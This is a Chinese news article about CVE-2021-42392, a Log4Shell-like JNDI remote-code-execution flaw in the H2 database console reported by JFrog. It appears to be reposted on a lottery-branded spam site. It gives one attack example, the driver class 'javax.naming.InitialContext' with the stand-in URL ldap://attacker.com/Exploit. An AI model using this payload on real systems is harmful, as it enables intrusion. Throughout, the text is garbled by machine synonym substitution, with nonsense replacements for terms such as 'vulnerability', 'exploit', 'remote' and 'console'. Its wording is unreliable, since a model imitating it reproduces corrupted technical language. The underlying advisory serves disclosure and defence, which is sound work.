警戒!与Log4Shell相似的Java破绽出现了
60购彩
60购彩

让建站和SEO变得简单

让不懂建站的用户快速建站,让会建站的提高建站效率!

最新资讯

警戒!与Log4Shell相似的Java破绽出现了

发布日期:2022-05-15 15:09    点击次数:198

安全推敲人员警戒称,一个最新的严重的Java不实,其骨子与现在在人人范围内诳骗的污名昭著的 Log4Shell 破绽调换 。

CVE-2021-42392 尚未在国度破绽数据库 (NVD) 中稳当发布,但据软件企业内JFrog 称,它影响了流行的H2 Java SQL 数据库的抑遏台。

这家安全公司辅导,任何现在运转的败露于其 LAN 或 WAN 的 H2 抑遏台的组织立行将数据库更新到 2.0.206 版块,不然袭击者可能会诳骗它进行未经身份考证的云尔代码现实 (RCE)。

与 Log4Shell 雷同,该不实与 JNDI(Java 定名和目次接口)“云尔类加载”干系。JNDI 是一种为 Java 应用法子提供定名和目次功能的 API。这意味着要是袭击者不错将坏心 URL 赢得到 JNDI 查找中,它就不错启用 RCE。

“简而言之,根柢原因近似于 Log4Shell——H2 数据库框架中的多个代码旅途将未流程滤的袭击者抑遏的 URL 传递给 javax.naming.Context.lookup 函数,该函数允许云尔代码库加载(AKA Java 代码注入 AKA云尔代码现实),” JFrog 评释道。

“具体来说,org.h2.util.JdbcUtils.getConnection 设施以驱动类名和数据库 URL 手脚参数。要是驱动法子的类可分派给 javax.naming.Context 类,则该设施会从中实例化一个对象并调用其查找设施。”

提供诸如“javax.naming.InitialContext”之类的驱动法子类和像 ldap://attacker.com/Exploit 这么简短的 URL 将导致云尔代码现实。

JFrog 暗示,该破绽很是危境,因为 H2 数据库包很是受迎接。该公司宣称,它是前 50 个最受迎接的 Maven 软件包之一,领有近 7000 个工件依赖项。

然而,有一些原因导致诳骗不会像 Log4Shell 那样野蛮。一方面,它具有“平直影响范围”,这意味着易受袭击的职业器应该更容易找到。其次,在大大都 H2 刊行版中,抑遏台只监听 localhost 相接,这意味着默许缔造是不成诳骗的。

“很多供应商可能正在运转 H2 数据库,但莫得运转 H2 抑遏台,天然除了抑遏台以外还有其他向量不错诳骗这个问题,但这些其他向量是依赖于荆棘文的,不太可能败露给云尔袭击者。”JFrog 补充道。